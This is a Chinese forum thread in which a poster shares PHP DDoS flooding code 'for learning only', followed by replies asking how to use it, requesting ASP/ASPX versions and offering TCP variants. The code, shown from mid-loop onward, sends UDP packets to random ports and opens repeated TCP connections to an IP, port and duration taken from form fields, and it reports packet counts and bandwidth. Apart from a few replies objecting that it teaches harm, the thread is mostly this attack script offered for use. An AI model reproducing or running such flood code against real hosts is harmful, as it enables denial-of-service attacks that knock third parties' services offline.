贴个完整版的PHPDDOS攻击代码,仅供学习之用。
[*]$max_time){[*]break;
[*]}
[*]$fp = fsockopen("udp://$ip",$rand,$errno,$errstr,5);
[*]if($fp){
[*]fwrite($fp,$out);
[*]fclose($fp);
[*]}
[*]}
[*]echo "Packet complete at ".time('h:i:s')." with $packets (".round(($packets*65)/1024,2) ." mB)\n";
[*];echo '
[*]
[*]
[*]
[*]';
[*]ini_set("display_errors","Off");
[*]$packets = 0;
[*]$ipb = $_POST['ipb'];
[*]$portb = $_POST['portb'];
[*]set_time_limit(0);
[*]ignore_user_abort(FALSE);
[*]$exec_time = $_POST['timeb'];
[*]$time = time();
[*]$max_time = $time+$exec_time;
[*]while(1){
[*]$packets++;
[*]if(time() >$max_time){
[*]break;
[*]}
[*]$fp = fsockopen("tcp://$ipb",$portb,$errno,$errstr,0);
[*]}
[*]echo "
\n";
[*]echo "
\n";
[*]echo "-";
[*]echo "
\n";
[*]echo " zgs ".$packets."g";
[*]echo "
\n";
[*]echo "
\n";
[*]echo " zll ".round(($packets*74*8)/(1024*1024),2)."Mbps";
[*]echo "
\n";
[*]echo "-";
[*]echo "
\n";
[*]?>复制代码
[ 本帖最后由 嘿嘿嘿嘿 于 2011-10-28 09:54 编辑 ] 怎么用 aspxcgi版的也贴上
006.gif
现在都玩Tcp的了 不用UDP了
002.gif
002.gif
mark.
022.gif
这发出来不是带坏银么 加权限 不觉得有用 asp和aspx的有,但是 是加密过得。 有什么用? 教坏人,原帖由 ediffier 于 2011-10-28 09:52 发表
back.gif
现在都玩Tcp的了 不用UDP了
002.gif
002.gif
确实啊,我有tcp的代码,谁要???
008.gif
看清楚代码,UDP和TCP都是在里面,这是个完整版。